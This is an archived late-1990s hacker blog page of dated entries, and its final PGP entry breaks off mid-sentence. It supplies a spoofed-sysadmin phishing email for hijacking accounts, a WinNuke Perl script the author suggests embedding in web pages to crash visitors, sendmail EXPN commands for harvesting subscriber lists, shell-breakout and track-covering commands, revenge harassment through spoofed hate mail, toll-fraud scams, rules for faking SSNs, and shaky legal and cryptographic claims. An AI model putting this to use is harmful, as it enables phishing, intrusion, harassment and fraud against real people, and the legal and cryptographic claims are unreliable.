originally found at http://www.s-alchemy.com/rsnake/siteb.html SITE B WELCOME! Welcome to Site B, the next generation in RSnake's hacking corner. This is my newest site! Now, if you haven't been to my original corner I suggest you visit there, before looking any further. This is just more of the same, with some new stuff, and better explinations, and more stuff, and did I mention more stuff? I want this site to be as big a hit as my other site was (in entirety) so if you have any suggestions that could make it even better, please just mail me and tell me what you want to know about. This version (Site B) is NO LONGER hosted by the TCN Click here to find out why. The premise of this specific page is to ween myself away from JUST talking about the software side of hacking. That is why I don't call this page "RSnake's Hacking Corner II" or something of equal awefulness. This page will be devoted toward, not only the software aspects of hacking, but also phreaking and social engineering. It will deal with just about every aspect of hacking, as WELL as the software. I will try to make this page more diverse in it's content, while still upholding my standards of fact vs fiction. Now, once again, I will give you my warnings about the information held on this page. I am mearly writing a few thoughts down for educational purposes ONLY! If you go out and do stupid shit on your own, don't come crying to me. If I put stuff on here that is OBVIOUSLY only for breaking and not for hacking (such as the ping bug) understand that it is because I have been thinking about it or have interest in it, not because I think you should go and try it. Big brother IS watching! With that, on with the page! _________________________________________________________________ --DATE-8-30-97--SOCIAL ENGINEERING-- Hello all! Long time no see! Well to kick off Site B, and to prove I am a man of my word, my first entry will have to do with social engineering, and NOT exploits. This is usable by ANYONE and not just the Linux/Unix gurus that you fear so much. Social engineering is the art of hacking PEOPLE. Now, don't think that I am some sort of Nazi, trying to ge people to conform to an alternate reality or anything, just think of social engineering as the ability to tell a lie that produces some predictable (benificial) outcome. It is just being a con artist (more or less). First I will give you a usable aplications, and then talk about it. Let's start with a letter (spoofed) from the Sys-Admin of an internet provider to one of it's paying customers: Dear Customer, To provide you, the user, with better security, we have recently began to upgrade our system's security. With the treat of malicious computer hackers ever present, we have decided to beef up our precautionary measures. In doing so, one of our automated password protection systems (APPS) decided that your password is insecure. Normally we wouldn't call your attention to this, however, recently, we received notice in our logs of attempts to crack users passwords. We fear your security could be compromised. Our APPS has provided you with a substitute to your current password that is many times more secure against DES cracking programs. For the time being we HIGHLY suggest you use the password allocated for you (appended automatically to this letter). Please do not reply to this letter directly. If you have further questions or comments, feel free to contact our business office during standard business hours. Below is our APPS program's directions. We ask that you read the directions, write them down along with your new password, and then delete this letter to insure your privacy. On behalf of our staff, we sincerely apologize for this inconvenience, and will update you if anything else directly concerns you. We hope you find this new service helpful and relitively non-obtrusive. Thank you for your patience and understanding. -Sincerely System Administrator -------------------APPS PASSWORD CHANGING PROCEDURE----------------- This is an automated message: To change your password exit out of your mail and go to your $ prompt, and then type in.... [add your own stuff] Your new SECURE password to enter: b_/0vG8a ------------------------END APPS PROCEDURE-------------------------- Now obviously this is rough, and hopefully you will have done research on your target, to know how to explain how to change the password. (Note: make SURE your new password has only number, letters and symbols (minus @ and # (because of the subtractive nature of those two symbols on many systems) and NOT control or alt charachters). Most people will do what they are told, unless they have REASON to suspect. Remember to spoof the e-mail (go to my old hacking corner to read on how to do that if you don't already know) so it looks like it is comming from root at that provider. This is one of many tricks you can use to gain remote access on your target machine. Be creative. I have seen at least 20 varations on that theme that would all work. The human machine is very flawed and easily exploited. If you get this kind of e-mail, EVER, mail it to me and your local sys-admin. I know both of us would be very interested to read it. Stay out of trouble! Hasta! _________________________________________________________________ WORD OF THE DAY: [anisotropic] RSnake's definition: Say you have a circle that is 2"x2" inside this window. If it was programmed to have isotropic properties, and you changed the horozontal width (to 4" instead of 8" for instance) of your screen, the circle would become a vertically enlongated elipse (2" tall and 1" wide) because it is proportionaly (to the width) the same. An anisotropic circle, however, wouldn't change, regardless of the dimentions of the screen you were viewing it through. This is how Netscape, and all other hyper text browsers handle images, and also a fundamental idea when programming in VC++. Hasta! _________________________________________________________________ --DATE--9-10-97--WHERE TO LOOK-- Hello! Today I am going to hit on where to look for passwords and what to look for when you find yourself in a place that might house something interesting (an office of some sort). People are stupid. They forget things ALL the time. This is something you can take advantage of, BECAUSE, since people don't WANT to forget everything they learn every 10 seconds, they have a tendancy to write things down. Well, in computer security, this is a HUGE hazzard. If you know where to look, you can find the secrets to get yourself into the strangest of places. For instance: A friend and I found ourselves needing copies of an paper, so my friend's mother took us into the back of her office, and let us have free reign on the office copy machine. While there, I noticed that was also the same room where the office held their dialup modems, and their main system. Within five seconds of random searching I had access to the system. How? They left a sticky note on the side of their computer (away from the door hoping that no one would be able to see it). Obviously the secretaries had kept forgetting the password to get into the machine so they wrote it down on a sticky note (nice and yellow for the passer-byer hacker to notice). Where should you look for these obvious places? On the sides of the monitors, on the wall, on file cabinents, in the drawers, on the walls of the drawers, under the desk, under a book, under the keyboard, under the mouse pad.... Places that would be a good candidates to look for the password are anywhere that is a "good" hiding place. Just look around. I read once, that the two greatest threats to a computer system are the secretaries and temps. Well in this case the secretaries were the problem. If you were interested, I didn't exp loit the system, since it was a friend and I instead told the mother that she should change the system's password and gave her a brief talk on computer security. That's where to look. Take it easy! Hasta! _________________________________________________________________ --DATE--9-12-97--PEDOPHILIA-- I have recently become involved in one of the most vast fights on the internet. This is the fight against pedophilia. I am the founder of a group called EHAP (Ethical Hackers Against Pedophilia). It is not the purpose of this page to talk about it, but if you want more information on this group or it's functions, please visit our web-site at http://www.hackers.com/ehap to find out more. Hasta! _________________________________________________________________ --DATE--9-12-97--SPECIAL CHARACHTERS-- On one of the mailing lists that I was on, I recieved an e-mail about someone who was compiling a program using gcc. The person was annoyed, because "after compiling using: gcc 10int.c -o 10int.c it left behind a file called #10int.c#" Here is my reply: Ahh the fun times with "special charachters". Well first of all, if you want to HIDE files, you can use ~'s as in: ~rsnake meaning, when they try to cd into ~rsnake they instead go no-where but to my home directory, unless they know how to get around that... it is really easy. just type: rm \#10int.c\# ...the \ says that it is a special charachter. that is the same way you would get into that directory: cd \~rsnake You can use that trick as you like of course.. or even mess with people and call them other users names... heheh... That file, incidentally, was created, not by gcc, but by your editor. It most likely panicked and left that file as a residue when you forcibly quit out. *yawn* Take it easy! Hasta! In that instance the user mailed me back, and I was right, he had been using Xjed (an Xterm (GUI) version of jed (a larger more versital version of ed)) and it had panicked out and left behind that file, and after issing that command he was able to get rid of it. Simple? Yup! Take it easy! Hasta! _________________________________________________________________ --DATE--11-13-97--WIN NUKE ETC.-- This is a letter I got in reference to the old Win-Nuke bug. Thought it might be interesting to you people out there. Take it easy... > Hi, > Could you explain a little about the win-nuke bug? i.e. port number, > end result, how to exploit it, etc. > Thanks Sure, the bug is simple, when connecting to port 139 on any unpatched NT or 95 machine, all you have to do is send an OOB (out of band) packet and the system faults and blue-screens. The end result is that your computer get's fried. The only way to use this bug is to use a program like win-nuke or build it in PERL (I have seen it in one line of Perl) to send a OOB packet to the 139 port. I have a copy of winnuke (designed for Linux/UNIX) on my homepage (http://www.s-alchemy.com/rsnake) if you are interested. There is a theory going around that if you telnet to the 139 port and THEN send an OOB packet it will blue-screen patched boxes, but this is NOT true. I designed a program similar to Win-nuke called winnewk and it was unsucessful in providing any kind of error on patched boxes. After talking directly to Microsoft, it was found that this rumour was bunk and there is no way that it would be possible. Not that it matters... ;) > p.s. very informative page, latest addition to my bookmarks Cool... glad to hear it. :) Take it easy. Hasta! _________________________________________________________________ --DATE--12-13-97--MORE FOOLPROOF HACKS-- I got this letter a while back, and it goes into more of how to get around foolproof than I went into on my other site. I want to make something clear to everyone, when I post something on this site, I don't mean that it is the ONLY way to do something, in lots of cases there are other and perhaps better ways to get around security. I just put a few thoughts down on this page to make let you guys know there IS a way around these types of security. Anyway, here you go... Hasta! -- hello, I just stumbled onto your site via skullcap's site, and I am most impressed. I've been a long time Mac guy and know other ways to disable FoolProof (I've been living with it in school for two years straight). 1. Hold down "shift" during startup. This disable's all extensions.This rarely works since FoolProof has driver level protection ( this works best on crappy classicII's and what have you). It helps if you flik the power switch up & down a few times to jar it up a little. 2. Hold down the space bar at startup. This only works for system 7.5.x (If it's not, it's probably not worth breaking into anyway). This brings up the extensions manager control panel. From here you just uncheck FoolProof and your set. This is the best way to disable foolproof that I've seen. Just be sure to turn it on again when you're finished. 3. Write an Applescript that moves the selcted file into another folder other than the system folder. Have yet to find the syntax on this, have'nt worked on it much. There are other things you can do on a mac after you disabled foolproof. DON'T BE LAME AND REFORMATTE THE HARD DRIVE, YOU WILL GET CAUGHT. Instead, install resedit and the Forker extension and try to decrypt the password that's stored in the preferences in the System folder. This isn't really my department but I'm working on that aswell and will let you know. Other things to do is to check out www.machacks.com and install some of those pranking files into the computer. Trust me, you want to check out that site if you have a mac. Any way, I love your site keep it cool. Over and Out _________________________________________________________________ --DATE--12-15-97--Spoofing DNS in mIRC-- Ever wondered how those "3133t" (3133t = eleet = elite) bastards spoof their DNS and IP addresses in IRC? Well for the first time it will be explained in plain english (sorta). ;) You know that intro screen in mIRC that lets you provide mIRC with the information it needs to validate your user name ecetera? Well, that is your path to anonymity. Click on that far right tab and find the socks control. That is, find the control that allows mIRC to use SOCKS firewalls. Now, the trick is to find a server that has a firewall that will let you route through it. That is the tricky part. Experiment with bigger providers, as they are more likely to have a SOCKS firewall installed. Now, put in that server name into your socks control, and put in a matching e-mail address. IE: if the server is asdf.blah.net put in bruno@asdf.blah.net or bruno@blah.net or whatever. It has to be similar to fool anyone. You are now masked AND you are protected by that firewall, because, damnit, you ARE using it as your personal firewall (SOCKS firewall that is). You win twice!! ;) Hasta! _________________________________________________________________ --DATE--12-16-97--Breaking out of lame security in Win `95-- Stuck using a locked Windows `95 machine? Here are some basic techniques to get you out and free to roam around. First of all, carry a boot disk with you at all times. A boot disk should consist of at least these files: command.com autoexec.bat config.sys Copy them from your own machine, or an un-locked machine and put them onto a formatted floppy disk. Then put them into the target machine and cycle the power. That works in many cases to get to a dos prompt. Another technique is to use internet explorer as a shell. How can it be used as a shell? Well, type in "c:" as a URL in the "open" common dialogue box. It will then give you a directory listing of the machine you are using. From there you are free to roam the system. Also, Microsoft Word and Excell have the same bugs, but are instead found in the help menu. Explore around, you'll find it. Hasta! _________________________________________________________________ --DATE--12-17-97--How someone made money off his 800 number-- This is an interesting hack I found out about from a friend working at a university. It is less technical and more social engineering (for those unfamiliar with that term, Social Engineering (S.E. for short) is the art of lying to get information or to get what you want (lying for a purpose vs. lying for shits and giggles)). This hack involved a hacker who was looking for some spare cash. This guy set up his own personal 800 charge number (he set it up to make charges per phone-call, like 900 numbers do). So it was NOT a toll free charge by any means. In fact he made the toll charge extraordinarilly high. I am guessing on the order of $10 a minute. So he called up the university, and who knows where-else, (local numbers only of course) and was routing his number so it was un-traceable (beside the point). Then when he got ahold of someone on campus (some lame secretary or something) he told them that he was some professor and he needed to dial out, but couldn't on his phone, but that it was a toll free number. He told her to do it for him, and because she belived it was a toll free number it made sence. Thus, she dialed out and the hacker stayed on the line for hours at a time (hours * $600/hour = a lot of money)!!! If he had more than one phone devoted toward it, he could be making litterally thousands of dollars per hour. After thought: he has not been caught yet. ;) Hasta! _________________________________________________________________ --DATE--12-18-97--Problem in WinGate (new hack)-- WinGate is a program that essentially allows a LAN to connect to the net via a dialup connect or ISDN. Information on this product can be found at http://www.wingate.net/ The problem lies in WinGate allows you to telnet to it, and then route out thereby "laundering" your IP address. This causes you to become un-traceable, and WinGate is brilliant in that it doesn't log your address. So unless you are stupid you can get away with it. There are several programs to discover what IPs run WinGate out there, and many more in creation. This is a PRIME target for bulk spammers and spoofers, as well as hackers alike. This could have been fixed by binding it to the inner LANs. Basically anything you can do on the internet can be done by this unwilling laundry service for your source IP compliments of WinGate. _________________________________________________________________ --DATE--12-18-96--Kill Mac with TCP/IP Stack glitch-- Pretty damned simple. Pick yourself up a copy of "strobe" and scan the target machine from the 1st to the 65535th (last) port. It will have TCP/IP overrun and use CPU exhaustion to crash. Pretty simple, I told you. And people thought Macs were safe! Pshaw! Hasta! _________________________________________________________________ --DATE--12-19-97--Get `em back (revenge)-- Want some real revenge from those assholes who flame you? Well, let's assume for a minute that you DO have their e-mail address. If you don't then get it, that isn't my problem. Now, I hope you know how to spoof e-mail, because if you don't you again, are screwed. Now, assuming you know the person's e-mail address, and you know how to spoof, send an e-mail spoofed from his/her account to all your local extreemists. Send anti-semetic notes to the Jewish Coalition, and send pro-semetic stuff to the Nazi, or white brotherhood lists. Send core-dumps to the hackers. To every extreemist group, send hate-mail to the opposite group from your target's address. If you have the person's phone number or address, tack it on as a phony signature file for good measure. ;) Now how about tangible revenge? Now we are assuming you know the person's real name AND their address (again, if you don't that isn't my problem (although you might want to try http://www.four11.com)). Go to your local library (be careful doing this because someone might think you are ripping things off), and go through the periodicals section. Then go through every single magazine you can think of that would have subscription cards in them. (You can also do this at grocery stores or book stores, but don't let anyone think you are shop-lifting). Now take all those subscription cards and send them from your target's address. If you get serveral hundred and fill them all out, I can gaurantee you, that at least one or two of those (assuming they are subscription to catalogues etc...) will sell the address and that person will be floating in junk mail every day from that point on. The best ones to do this with are the r or x rated men's magazines, because they sell addresses most often (they have very little scruples about such things). It will take a few hours out of your day and will cause them more grief than you can know. I don't recommend doing either of these tricks unless you hate the person enough to force them to change e-mail addresses, phone numbers and possible even move! After thought: most of the best hackers I have known go to the library on a regular basis. Just food for thought. The library is a great place to learn and is a nice change to the stagnant air of the computer labs. ;) Please don't get into any trouble guys/gals. Hasta! _________________________________________________________________ --DATE--12-21-97--WinNuke in Perl-- Here it is, just a few lines of perl and you are good to go! Malicious website designers can modify this to kill off any server through cgi (commone gateway interface). If someone stuffed this bad-boy into their cgi script on their web-page to kill off anyone on a Gates-box. Make sure to change your.target.com to the actual address you want to kill... or perhaps make it dynamic to kill off people who visit. Hrm... I wonder what the result would be if someone hacked, and then put this on the Micro$oft website? #!/usr/bin/perl use IO::Socket; IO::Socket::INET ->new(PeerAddr=>"your.target.com:139") ->send("bye", MSG_OOB); _________________________________________________________________ --DATE--12-22-97--How write and compile C (1st class)-- Well, I am finally going to do it. I am going to write down a couple thoughts on writing in C. DO NOT ASK ME TO DO IT ANYMORE, as this is a first thing for me, and if I get a whole lot of spam about it, I will stop doing it. Alright? How do you compile in the programming language, C? Well, let's assume you are using Linux or Unix for this task (because damnit, it's better!). From your shell you see a $ or a % or a # or something similar. Now let's say you have your code called "uncompiled_exploit.c" and you want to compile it. It is really very easy. Type in this command: gcc -o compiled_exploit uncompiled_exploit.c The first string after the -o is what the compiled code will be called. The uncompiled code will still be there, but it won't run. Now, to run the code you mearly type the name of the compiled code into the prompt and voila! The same is true with any C compiler, and even with C++, although dealing with libraries can be very tricky. For the time being let's just stick with that, shall we? Now let's write our first program in C. Why do I choose C to teach? Because once you know C you can write in C++ but not the reverse. A LOT of code you will find for exploits are written ONLY in C, and if you have a good basis on what you are doing in C you will understand any code that you encounter (yes, that even includes VC++, sorta). This code is very simple. Type it in EXACTLY as I have it typed. Spaces and tabs are not important for the most part, but for your first program, just do it exactly as I do for lack of ease. Feel free to omit the comments: /* first program: first.c this iS a comment beacuse it's between the stars and slashes, you will just have to get used to these coding conventions */ #include /* this is your standard include library for all your c programs. this allows you to use the printf() function used below */ int main() { /* the int main crap is your main function. everything between the {}'S is your main function */ printf ("This is how you print a line in C.\n"); /* the semicolon at the end of the line tells you that that line of code is over. the \n means that you want to have a carrage return and skip down to the next line. */ printf ("You can also put in tabs and quotes" "with the \\t and \" commands: " "\"asdf\tasdf\"\n"); /* \t makes tabs, \b backspaces, etc... if you want to be able to read a \ put a slash before it: \\ like in the above example. you also must use this same technique when commenting out quotes. you also may span commands over several lines, as shown above in the printf() command */ return 0; /* because your main function was declared as an int (an integer) it must return a number so that is what the above function does. if you wanted to return with an error, you could return with -1, but we will get into that later. */ } /* end of main() */ Ok, that was your first program. Now to compile it. At your prompt type: gcc -o first first.c If it didn't work, type ls -la core and if the line "core not found" comes up, you didn't core dump. If a line comes up other than that, type: rm core and you will have to fix whatever problem you made. This shouldn't happen untill you get further in your programming, but make sure you type it in carefully, or it won't work. And now to run it just type in: first Pretty straight forward? I hope so. ;) Hasta! _________________________________________________________________ --DATE--1-4-98--EXPN majodomo exploit-- This is a relatively new bud that was uncovered as a vulnerability in sendmail to uncover the subscriber list in a majordomo list. When someone sends an e-mail to a majordomo list the mail is piped through an alias that wraps the message including some other aliases. One of those aliases also includes the real list with all the e-mail addresses of all the subscribers in it. The potential harm in this is blatantly obvious. To exploit this technique telnet to the sendmail port of the machine in question, then EXPN the e-mail address of the majordomo list, and then read where the alias goes to. From there, EXPN that alias and poof, you have all the e-mail addresses of all the subscribers. E.G.: telnet target.net 25 220 target.net ESMP Sendmail 8.8.5/Target-971021-1 ready at ... EXPN mail-list-name 250 <"/usr/local/mail/majordomo/wrapper resend -l mail-list-name -h target.net mail-list-name-list"@target.net> EXPN mail-list-name-list And poof... you will have all the e-mail addresses of all the subscribers of the mailing list. The second EXPN is the second to last argument of the alias (mail-list-name-list). That is where all the account names are stored. Thanks to James Ponder for some of the info here. _________________________________________________________________ --DATE--1-7-98--How someone made money from his 800 number II-- Alright, you guys remember the guy calling the university right? Alright, well I heared this on a news report on my way to go gamble in Reno. Some guy using a normal number (set up like a toll number) calls people, and leaves a distressing message about their father or mother or something getting into an accident, and that they need to contact this number in order to get ahold of this (toll) number. Then when they call the number, it is a machine, that is set up with broken english, to keep them on the line as long as possible. Also, this same person has been reported to use pager numbers and other similar scams. He was reported charging as much as $100 a minute (which is a bit hard to belive, but that is what the radio said). After thought: he has not been caught yet. ;) Hasta! _________________________________________________________________ --DATE--1-22-98--Thoughts-- Well, today, I am going to write down a few thoughts (technical because I have been thinking about them. People often want to know what I am up to these days (because I have been falling out of public eye a tad) so I will appease that, and also make an entry while I am at it. First of all, the other day I went into a chatroom (because I was bored) and people started asking me (this was an HTML chat room by the way) if there was a way to stop the chatroom. Well, frankly, until that time, I had never thought about crashing it, but now that I have thought about it for a little while, YES, there IS a way to use CPU exhaustion to basically slow down the room to a halt. I haven't written the program personally but I can't see that it would be more than 20-30 lines of shell programming at most. You could even do it by hand. It would be using the chargen port. You would connect to the remote HTML port via telnet on a Linux/Unix box and then pipe chargen (off another machine) into it. If you bounced a couple signals, I am SURE you could crash the room. It would probably not shut down the port, but it would make it so that everyone in the room stopped seeing text, etc... Next, I was thinking about Kerberos authentication. Here is why I belive Kerberos authentication is a BAD idea for small networks. Unless you have a single machine that is producing the Kerberos certificates, you are running the risk (since it is a multi user system) that someone can hack the Kerberos machine and get ahold of the primary name server through trust. Trust is evil, and Kerberos THRIVES on trust. If you get a Kerberos ticket you are destined for root. A friend of mine got on a HUGE (very secure) net- work through a very small private linux box on an ISDN (it was an assumed trusted machine (STUPID)). He then used that machine to log into one of the bigger machines (multiuser) and used some social engineering skills to get access to an even bigger machine. And then it was a matter of packet sniffing a sys-admin's password to get access to the primary name server, and then, thanks to Kerberos, he had access to everything (including the ability to add his own machine as a trusted machine). Dumb, if you ask me. Next. I have been working with a small company designing some really nasty authentication for Credit Cards, etc. So for the first time, I am working the security aspect of hacking. I got my hands on some fairly interesting RSA source code, that allows me to send encrypted data over untrusted lines. The problem lies in that to make this work, I have to make every computer that wants to use this product be able to access C. That might not seem like a problem, but there are lots of systems (ISPs) out there that won't allow C or precompiled binaries to be run. So this is something I am going to have to work out (without recoding PGP into PERL). Next. I have been asked to write for an internet magazine. Now, I am not sure what I am going to do, but when/if it ever gets off the ground I will let you all know about it. Well... I guess that's it for now... Take it easy all. Hasta! _________________________________________________________________ --DATE--1-26-98--Making money #3-- Okay, here is one I heared from a friend (sorta). Now this requires some on-site "hacking". Okay, everyone has heard of those department stores, etc, that pay you the difference if they have a discount a week later. For instance say something is selling for $45.95 one week, and the next week it goes on sale for $38.95, they garuntee you (the customer) that they will pay you the difference (the $7 in this case) to avoid "bait and hook" lawsuites. So, you find yourself at a department store, what should YOU do to take advantage of this? Well collect EVERY receipt that you can find. This means in the trashcans out front, and dumpster out back (if you can get to it) and any that you might happen accross while in the store. Then keep your eyes on the local papers for that store. If you happen to notice that something has gone on sale, you just return to that store, and collect the money that is owed to you (the bearer of the reciept). The best part is that (aside from the loitering part) it is completely legal. Stay out of trouble now, you hear? ;) Hasta! _________________________________________________________________ --DATE--1-29-98--Mail-- > Hi I'v read your page > http://www.s-alchemy.com/rsnake/corner.shtml --kool! > I'd have a question: > how do I find out if a and ELF SYSTEM? > what commands? > thank's Good question, and one that I am unsure of. I will ask a buddy of mine and see if he know the answer. I listed a few on the page. You may want to ask your system administrator if he knows in a pinch. I will mail You if I find out. You can find out what kind of system you are using by typing "uname -a" and then you can check the distribution with the manufacturor and ask them if it uses ELF system binaries. That's the only thing I can think of off hand. Hasta! > thank's very much for that promp reply. Kool! I'v been visiting your > page and trying exploits, Kool. I'v tried the rlogin and it worked! > Thank,s very much , I'll keep on vititing your cool page Hasta! Well, I talked to my friend, and he came up with some interesting ideas (some of which I slightly dissagree with). He said there is no (good) way to tell if something is an ELF binary by any command, however there are some things to check so you can narrow down your search. Do an "ls -al /bin/" and if things listed in that directory are large (meaning several hundred k for something fairly simple like "ls") then you are more likely to be sure that it is an ELF system. He also said that you can look at login and see, however, I dissagree, as that is sometimes dynamically and sometimes statically compiled, so that is a bad example, and could lead you astray. You might also want to do a "strings" command on things found in /bin and that might show if it is an ELF system, but again, I dissagree and I think you best bet is either talk to the distributor, OR look at things found in /bin and see if they are huge files (anything over 100,000k is huge). I hope that helps. By the way, check out "Site B" sometime, I will put these letters on there. ;) Hasta! _________________________________________________________________ --DATE--1-30-98--What to do when caught-- I read a REALLY good artical in Motercycle World last August and it stuck with me as being one of the single greatest papers I have read to date. Motercycle world is about just that, motercycles. I don't own one personally currently, but I have, and my father does, so I do know quite a bit about the sport, and occationally I read the magazine when I am home visiting. Regardless, the paper went into what to do when caught on the street by police. For reasons of this paper, I am not going to cite the paper, because I am going to broaden the scope of what was said considerably. A common misnomer is that it is illegal to lie to a police officer. This is just plain falacy. It is ABSOLUTLY legal to lie to police officers in all but two cases. The first is if the officer asks your identity, and the second is if you are NOT a suspect in a crime (as that is considered hindering an ongoing investigation). However, on the flip side, officers ARE allowed to lie to you. It is a known statistic that 90% of all convictions are made by confession alone. A police officer doesn't have to prove a thing if you confess. So how does an officer get you to confess? Well in the example the paper used, when a policeman pulls you over off the side of the road, he first asks you "How fast do you think you were going?" Most people would either say, "I don't know" or tell the police officer EXACTLY how fast they were going. This is considered a confession. What SHOULD you do? Well, I am not TELLING you to lie, but let's put it this way, unless they used official methods of checking your speed (clocking your speed over a certain length of road, or radar checks in approved radar-zones) they cannot convict you of anything. By admitting to the fact that you were going however fast you were going you are giving up your constitutional rights. Police officers are (this is the god's honest truth here) TOLD to lie during police academy, to make dealing with criminals and the public as a whole easier. I can remember a few times when I was pulled over for various reasons, but once when I was speeding, the officer asked me what the speed limit was, and I told him 35, and he asked me how fast I was going, and I responded, "I belive I was going 35, sir." He told me that I was going quite above that (which I probably was knowing me and that particular street) but because he couldn't prove it, and I didn't admit to it, he had no reason to write me a ticket. Our very own Central Intelligence Agency (CIA) knows this fact all too well as their inside motto is: "Admit nothing. Deny Everything. Make counter accusations." The people who are least likely to get traffic violations are lawyers and ex-cons. Food for thought. The reason being, they know their constitutional rights. More on the traffic issues: There is a way of getting a ticket without anyone being around, and this is "photo radar". They have cameras at street intersections and they take a picture of your front licence plate if you disobey common road safety laws. What do you do if you recieve a ticket like this in the mail? Well, according to the ex-police officer in this artical you should completely ignore it. The ticket does NOT go on your DMV record, and is just a way to generate revenue for the state. Photo traffic violations do not constitute "service of summons". If you recieve a ticket like this via registered mail, refuse to sign, thereby forcing the people who wrote the ticket to hire someone to process the ticket at considerable expense. In most cases these tickets will be dropped immediately, because it will cost the state more money to try to get the money from you than if they just ignore your particular violation. The point of this being, know your rights. Remain silent when arrested. Talk to your attorney first. Know that you CAN lie to police officers. Know that police officers DO lie to you. Also, be NICE when talking to police officers. They have a shitty job to do, and I think we can all sympathyze with that. They are much friendlier and much easier to deal with when you are nice to them. They just want the respect that they (in most cases) deserve. Smile! Take care out there folks, and stay out of trouble! Hasta! _________________________________________________________________ --DATE--1-30-98--Mail-- > hello rsnake, I got a small question if you have time to answer. I > recently got a hotmail account and I noticed they show TONS of > information about the sender of mail. Is there a way to see that > information on normal email (the one that came with my prodigy). I'm > using netscape navigator 3.0 if you need to know that information. Any > help would be appreciated, thanks. Hrm, are you reffering to header information? If so, just save the document (go to file then go down to save as) into a html document on your hard-drive. Then just view that source with notepad or something similar. That will reveal headers. If you aren't talking about headers, I am not sure what you are reffering to. Hope that helps. Hasta! > Rsnake, the header information is exactly what I was referring to. I > know its only superficial information but I couldnt figre out a way to > access it. Now that brings up another question, if I save it into an > html format, could that activate a virus that was inside? Or can you > only get one by downloading an attached file. I hate to bother you so > much, but your one of the few people that gives straight answers. Thanks > a lot for your help. Hehe... Okay, yes, it is possible to execute a virus if you convert an e-mail to html AND view it through an html editor/browser. However, the virus would have to be written in either Java-script or VBscript (if you view the document through MSIExplorer). If it is written in any other language, it would have to be run. If you save the document, it will not save attachments, however, so you are pretty safe from that. I wouldn't recomend viewing headers through a browser though, because it will misinterpret certain charachters as part of HTML. Use notepad, or wordpad, open it as a .txt file and all will be good. Hope that helps. Hasta! _________________________________________________________________ --DATE--1-31-98--CHFN Vulnerability (possible)-- Hrm... well, while playing around on a local system (that I have access to), I noticed something interesting. There is a Linux/Unix command called chfn (change finger name) used to change information about a user (such as home addy, home phone, "real name" etc...). Anyway, while playing around with it, I noticed that it opened an editor to change this information. I am not sure of the version of chfn that I was using but if yours doesn't open up an editor, you can be sure that this is NOT the ver you are using. Anyway, it wrote to a tmp file called /tmp/chpass.xxxxxx (the x's are some combination of numbers, but suprisingly predictable). The tmp file is based (somewhat) on time. So if you made a symbolic link to /bin/bash or something (because chfn is suid root) you could theoretically overwrite bash and cause a nasty denial of service attack. This has really nasty potential. Of course you would have to write a fairly easy shell script (no I am not going to write it for you people) to link all the potential files to whatever the file is you wish to overwrite. Mind you this is all theoretical, and I haven't tested it, but I don't see why it wouldn't work. Okay, goodnight all. Hasta! _________________________________________________________________ --DATE--1-31-98--SSN-- People have asked me about social security numbers, etc... Not much to say about them. Except for a few numbers issued in the mid 70s all SSNs have 9 digits. Very few have been issued above 595. Anyone's SSN who is between 700-729 is most likely older as that was issued by the Railroad Retirement Agency and they haven't been assigned since the early 60s. As far as making your own SSN, here are some rules of thumb: SSNs never end in four zeros. They never start with 73, 79, 6 or 8. Lastly they very rarely start with 9 as there were very few ever issued. Here is the list of SSN for the United States and provinces. Stay out of trouble. Hasta! Alabama 416-424 Alaska 574 American Samoa 581-585 Arizona 526-527, 600-601 Akansas 429-432 California 545-573, 602-626 Colorado 521-524 Connecticut 040-049 Delaware 221-222 District of Columbia 577-579 Florida 261-267, 589-595 Georgia 252-260 Guam 581-585 Hawaii 575-576 Idaho 518-519 Illinois 318-361 Indiana 303-317 Iowa 478-485 Kansas 509-515 Kentucky 400-407 Louisiana 433-439 Maine 004-007 Maryland 212-220 Massachusetts 010-034 Michigan 362-386 Minnesota 468-477 Mississippi 425-428, 587-588 Missouri 486-500 Montana 516-517 Nebraska 505-508 Nevada 530 New Hampshire 001-003 New Jersey 135-158 New Mexico 525, 585 New York 050-134 North Carolina 237-246 North Dekota 501-502 Ohio 268-302 Oklahoma 440-448 Oregon 540-544 Pennsylvania 159-211 Philippine Islands 581-585 Puerto Rico 581-585 Rhode Island 035-039 South Carolina 247-251 South Dakota 503-504 Tennessee 408-415 Texas 449-467 Utah 528-529 Vermont 008-009 Virgin Islands 580 Virginia 223-231 Washington 531-539 West Virgina 232-236 Wisconsin 387-399 Wyoming 520 _________________________________________________________________ --DATE--2-9-98--Breaking out of the pine shell-- Thought I might put a brief entry on here about breaking out of the pine shell. What do I mean by that? Well, there are certain systems (I have personally encountered 4 exactly like this) that restrict telnet access (or try to) by making the shell you use pine (an e-mail editor) verses bash or ksh. (This would be the equivelant to being restricted to Eudora in Windows 95). You can see why this is annoying. Well, here is one way to break out of the shell. First of all, when pine opens up it goes to a screen that gives you certain commands. One of which is a setup command. You want to select that and then select config. Near the bottom are two lines (space bar down until you can't go any farther). Somewhere near the bottom will be lines saying "speller" and "image viewer". We will just use the first one for the time being. If it says "Fixed Value 'spell'" or something like that then you are basically screwed using this method. If it doesn't say that then you press enter, and type in the words "/bin/bash" into the input box. Then exit out of there, and save your new configuration. Then compose a message and press control-T. You should get a # sign or something similar. Voila! You now have free reign over your own shell account. If you had chosen to do this with "image viewer" you would have to send yourself a picture file and then tried to use it with the "V" command. Another nice little trick to remember is if you have access to a shell account, more than likely it also has FTP installed. There is nothing stopping you from uploading files (like a .profile or .login file) that will open /bin/bash before you ever have a chance to load pine up. All useful tricks in a pinch. Very sloppy though, and you WILL leave traces (.bash_history) so be careful and make sure to link your .bash_history to the null device to cover your tracks (or go back through FTP and delete your .bash_history and .profile if you put a new one there). You can link your .bash_history to the null device with this command "ln -s /dev/null .bash_history". Stay out of trouble now! Hasta! _________________________________________________________________ --DATE--3-17-98--PGP BREAKABLE???-- Okay, I was talking to a local PGP freak today for quite some time, and he told me some things of interest involving PGP. First of all this is mostly theory, and very little practice, but this could lead the way toward some massive attacks against the RSA algorythm. Let's say you have plaintext (P) and public key (Kp). When you encrypt P with Kp you get cyphertext (C). Pretty simple, right? Okay, here is where it get's a little nasty. It turns out that if you encrypt C with Kp multiple times, eventually it will lead back to P with O iterations. There is ALSO another way to break C back to P there is other variations of bits that are close enough that it will break the cyphertext called o. o occurs much more often than the guaranteed O and works almost as well. o and O depend greatly on the prime number used during encryption. (Essentially, when asked if you want quick prime-number generation, always say no). Strong prime numbers are prime numbers that when a computation is made (something like (x/2)+1) on a prime number, it creates another prime number. Strong-strong prime numbers is where you can do the operation twice and achieve another prime number. Okay, so that is our main attack now, breaking it through brute force. Dealing with mod256 this is doable, but when you get to military grade encryption 1024 or 2048 bits you are dealing with a whole new problem. Yes, it is exhaustivly possible, but it 